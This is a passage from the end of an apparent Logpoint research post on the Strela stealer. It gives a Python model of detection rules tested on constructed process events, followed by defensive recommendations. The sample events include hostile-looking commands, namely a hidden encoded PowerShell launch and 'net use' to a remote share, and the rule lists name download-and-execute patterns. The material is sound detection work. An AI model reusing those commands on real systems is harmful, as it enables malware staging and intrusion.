C:\Windows\System32\RpcProxy\RpcProxy.dll"))
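To show how the wscript/cscript, PowerShell and network-discovery alerts above behave on concrete events, here is an added Python model of their conditions (it is not Logpoint's query engine or code, and the regsvr32 alert is left out for length). The wildcard lists are transcribed from the three queries; the events are constructed process-creation records using the same normalised field names (process, command, parent_process, user), with made-up paths, users and a documentation IP address, and EXCLUDED_USERS stands in for the list of that name in the query.

```python
import fnmatch

# Constructed process-creation events in the shape of Sysmon Event ID 1 /
# Security 4688 records after field normalisation. Not logs from the real infection.
EVENTS = [
    # The chain the post describes: JS under a user profile, PowerShell with
    # suspicious parameters, net.exe mapping a remote share.
    {"id": 1, "user": "alice", "parent_process": "C:\\Windows\\explorer.exe",
     "process": "C:\\Windows\\System32\\wscript.exe",
     "command": 'wscript.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.js"'},
    {"id": 2, "user": "alice", "parent_process": "C:\\Windows\\System32\\wscript.exe",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command": "powershell.exe -NoProfile -WindowStyle Hidden -ec ZQBjAGgAbwA="},
    {"id": 3, "user": "alice",
     "parent_process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "process": "C:\\Windows\\System32\\net.exe",
     "command": "net use \\\\203.0.113.5\\share"},
    # Benign look-alikes: a vendor script outside user-writable paths, a .json
    # argument (excluded by the rule), and net.exe used for something else.
    {"id": 4, "user": "SYSTEM", "parent_process": "C:\\Windows\\System32\\services.exe",
     "process": "C:\\Windows\\System32\\cscript.exe",
     "command": 'cscript.exe "C:\\Program Files\\Vendor\\maint.vbs"'},
    {"id": 5, "user": "bob", "parent_process": "C:\\Windows\\explorer.exe",
     "process": "C:\\Windows\\System32\\wscript.exe",
     "command": "wscript.exe C:\\Users\\bob\\tool.js C:\\Users\\bob\\settings.json"},
    {"id": 6, "user": "bob", "parent_process": "C:\\Windows\\System32\\cmd.exe",
     "process": "C:\\Windows\\System32\\net.exe",
     "command": "net start spooler"},
]


def glob_any(value, patterns) -> bool:
    """Case-insensitive wildcard test standing in for the queries' IN [...] lists."""
    v = (value or "").lower()
    return any(fnmatch.fnmatchcase(v, p.lower()) for p in patterns)


# Suspicious File Execution Using Wscript or Cscript
SCRIPT_HOSTS = ["*\\wscript.exe", "*\\cscript.exe"]
SCRIPT_EXTS = ["*.jse*", "*.vbe*", "*.js*", "*.vba*", "*.vbs*", "*.wsf*"]
USER_PATHS = ["*C:\\Users*", "*\\AppData\\Local\\*", "*\\ProgramData\\*", "*\\Temp\\*"]


def suspicious_script_host(ev) -> bool:
    return (glob_any(ev.get("process"), SCRIPT_HOSTS)
            and glob_any(ev.get("command"), SCRIPT_EXTS)
            and glob_any(ev.get("command"), USER_PATHS)
            and not glob_any(ev.get("parent_process"), ["*\\winzip*"])
            and not glob_any(ev.get("command"), ["*.json*"]))


# Suspicious PowerShell Parameter Substring Detected
PS_HOSTS = ["*\\powershell.exe", "*\\pwsh.exe"]
PS_PARAMS = ["* -wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*", "* -executionp*",
             "* -e* bypass*", "* -sta *", "*FromBase64String*", "*irm*iex*",
             "Invoke-RestMethod*Invoke-Expression*"]


def suspicious_powershell(ev) -> bool:
    return glob_any(ev.get("process"), PS_HOSTS) and glob_any(ev.get("command"), PS_PARAMS)


# System Network Connections Discovery
NET_BINS = ["*net.exe", "*net1.exe", "*netstat.exe"]
NET_CMDS = ["*net* use*", "*net* sessions*", "*net* file*", "*netstat*"]
EXCLUDED_USERS = []  # stands in for the EXCLUDED_USERS list referenced by the query


def network_connection_discovery(ev) -> bool:
    if ev.get("user") in EXCLUDED_USERS:
        return False
    return ((glob_any(ev.get("process"), NET_BINS) and glob_any(ev.get("command"), NET_CMDS))
            or glob_any(ev.get("command"), ["*Get-NetTCPConnection*"]))


RULES = {
    "Suspicious File Execution Using Wscript or Cscript": suspicious_script_host,
    "Suspicious PowerShell Parameter Substring Detected": suspicious_powershell,
    "System Network Connections Discovery": network_connection_discovery,
}


def run_rules(events):
    """Return {event id: [alert names]} for every event that fires at least one rule."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev["id"]] = fired
    return hits


if __name__ == "__main__":
    for event_id, names in run_rules(EVENTS).items():
        print(event_id, names)
```

Events 1, 2 and 3 each fire exactly one alert, in the order the infection chain runs; events 4 to 6 fire none, which is the point of the path filter and the .json exclusion in the first query. The model is useful for regression-testing the wildcard lists when you tune exclusions, but it does not reproduce Logpoint's normalisation, so validate any change against the SIEM itself.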

Recommendation

Block Potentially Exploited File Types: Limit the execution of commonly exploited file types like .js, which threat actors frequently use for payload distribution. Exceptions should be carefully managed for trusted processes or authorized users to prevent disruption of legitimate activities.

Regular User Training: Conduct routine training sessions for users to recognize and respond to social engineering and phishing attempts. Awareness and preparedness significantly reduce the likelihood of infection through these attack vectors.

Network and Firewall Policies: Configure network policies and firewalls to block unauthorized connection attempts and outbound connections to untrusted remote hosts, reducing the risk of malware communication and data exfiltration.

Implement a Secure Email Gateway: Ensure the deployment of this technology, which plays a critical role in reducing risks by blocking the majority of malspam emails before they reach users.

Restrict Software Installation: Limit user privileges to prevent the installation and execution of unauthorized software, reducing exposure to potential infections.

Keep Devices and Software Updated: Regularly update devices, browsers, and other applications to patch known vulnerabilities and defend against evolving threats.

EDR Deployment: Employ Endpoint Detection and Response (EDR) solutions to identify suspicious activity, particularly script execution and binary downloads. Behavioural detection catches the infection early even when obfuscation such as that observed in Strela defeats signature-based tools.

Monitor Web Browsing Behavior: Track user browsing habits and restrict access to sites known for malicious or harmful content, preventing potential malware downloads.

Comprehensive Logging and Monitoring: Maintain thorough logging, asset visibility, and system monitoring. Regular audits should be conducted to detect anomalous activities. Robust log collection from all systems supports effective threat analysis and detection.

Log Retention Policy: Establish a log retention period of at least six months to ensure sufficient data is available for incident investigation, enabling a comprehensive understanding of any attack's origin and impact.

The post Strela: A newcomer in Stealer Family appeared first on Logpoint.

Article Link: Strela: A newcomer in Stealer Family | Logpoint Security Research
